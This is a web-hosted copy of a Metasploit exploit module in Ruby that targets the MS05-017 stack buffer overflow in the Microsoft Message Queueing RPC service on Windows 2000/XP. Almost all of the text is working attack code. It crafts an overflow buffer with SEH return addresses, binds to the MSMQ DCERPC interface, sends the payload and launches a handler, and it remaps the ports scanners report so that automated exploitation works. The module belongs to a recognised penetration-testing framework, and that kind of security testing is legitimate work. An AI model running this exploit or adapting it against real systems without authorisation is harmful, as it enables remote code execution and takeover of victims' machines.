Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/dcerpc/ms05_017_msmq.rb
32939 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::Remote::DCERPC

10
  include Msf::Exploit::Remote::Seh

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'MS05-017 Microsoft Message Queueing Service Path Overflow',

17
        'Description' => %q{

18
          This module exploits a stack buffer overflow in the RPC interface

19
          to the Microsoft Message Queueing service. The offset to the

20
          return address changes based on the length of the system

21
          hostname, so this must be provided via the 'HNAME' option.

22
          Much thanks to snort.org and Jean-Baptiste Marchand's

23
          excellent MSRPC website.

24
        },

25
        'Author' => [ 'hdm' ],

26
        'License' => MSF_LICENSE,

27
        'References' => [

28
          [ 'CVE', '2005-0059'],

29
          [ 'OSVDB', '15458'],

30
          [ 'MSB', 'MS05-017'],

31
          [ 'BID', '13112'],

32
        ],

33
        'Privileged' => true,

34
        'Payload' => {

35
          'Space' => 1024,

36
          'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e\xff",

37
          'StackAdjustment' => -3500

38


39
        },

40
        'Targets' => [

41
          [

42
            'Windows 2000 ALL / Windows XP SP0-SP1 (English)',

43
            {

44
              'Platform' => 'win',

45
              'Rets' => [ 0x004014e9, 0x01001209 ] # mqsvc.exe

46
            },

47
          ],

48
        ],

49
        'DisclosureDate' => '2005-04-12',

50
        'DefaultTarget' => 0,

51
        'Notes' => {

52
          'Reliability' => UNKNOWN_RELIABILITY,

53
          'Stability' => UNKNOWN_STABILITY,

54
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

55
        }

56
      )

57
    )

58


59
    # Change the default port values to point at MSMQ

60
    register_options(

61
      [

62
        Opt::RPORT(2103),

63
        OptString.new('HNAME', [ true, 'The NetBIOS hostname of the target' ]),

64
      ]

65
    )

66
  end

67


68
  def autofilter

69
    # Common vulnerability scanning tools report port 445/139

70
    # due to how they test for the vulnerability. Remap this

71
    # back to 2103 for automated exploitation

72


73
    rport = datastore['RPORT'].to_i

74
    if (rport == 445 or rport == 139)

75
      datastore['RPORT'] = 2103

76
    end

77


78
    # The NetBIOS hostname is required to exploit this bug reliably.

79
    if (!(datastore['HNAME']))

80
      # XXX automatically determine the hostname

81
      return false

82
    end

83


84
    true

85
  end

86


87
  def exploit

88
    # MSMQ supports three forms of queue names, the two we can use are

89
    # the IP address and the hostname. If we use the IP address via the

90
    # TCP: format, the offset to the SEH frame will change depending on

91
    # the length of the real hostname. For this reason, we force the user

92
    # to supply us with the actual hostname.

93


94
    # Formats: DIRECT=TCP:IPAddress\QueueName DIRECT=OS:ComputerName\QueueName

95


96
    queue_name = "OS:#{datastore['HNAME']}"

97
    queue_hlen = datastore['HNAME'].length * 2

98
    queue_path = unicode(queue_name + '\\PRIVATE$\\')

99


100
    buf = rand_text_english(4000, payload_badchars)

101


102
    # Windows 2000 SEH offset goes first

103
    buf[372 - queue_hlen + 0, 4] = [ target['Rets'][0] ].pack('V')

104
    buf[372 - queue_hlen - 4, 2] = "\xeb\x22"

105


106
    # Windows XP SEH offset goes second

107
    seh = generate_seh_payload(target['Rets'][1])

108
    buf[400 - queue_hlen - 4, seh.length] = seh

109


110
    # Append the path to the location and null terminate it

111
    queue_path << buf << "\x00\x00"

112


113
    # Get the unicode length of this string

114
    queue_path.length

115


116
    connect

117
    print_status("Trying target #{target.name}...")

118


119
    handle = dcerpc_handle('fdb3a030-065f-11d1-bb9b-00a024ea5525', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])

120
    print_status("Binding to #{handle} ...")

121
    dcerpc_bind(handle)

122
    print_status("Bound to #{handle} ...")

123


124
    stubdata =

125
      NDR.long(1) +

126
      NDR.long(1) +

127
      NDR.long(1) +

128
      NDR.long(3) +

129
      NDR.long(3) +

130
      NDR.long(2) +

131
      NDR.UnicodeConformantVaryingStringPreBuilt(queue_path)

132


133
    print_status('Sending exploit ...')

134


135
    dcerpc.call(9, stubdata)

136


137
    if (!dcerpc.last_response.nil? and !dcerpc.last_response.stub_data.nil?)

138
      case dcerpc.last_response.stub_data

139
      when "\x20\x00\x0e\xc0"

140
        print_status('The server rejected our request, the HNAME parameter could be incorrect')

141
      when "\x1e\x00\x0e\xc0"

142
        print_status('The server does not appear to be exploitable')

143
      else

144
        print_status('An unknown response was received from the server:')

145
        print_status('>> ' + dcerpc.last_response.stub_data.unpack('H*')[0])

146
      end

147
    end

148


149
    handler

150
    disconnect

151
  end

152
end

153


154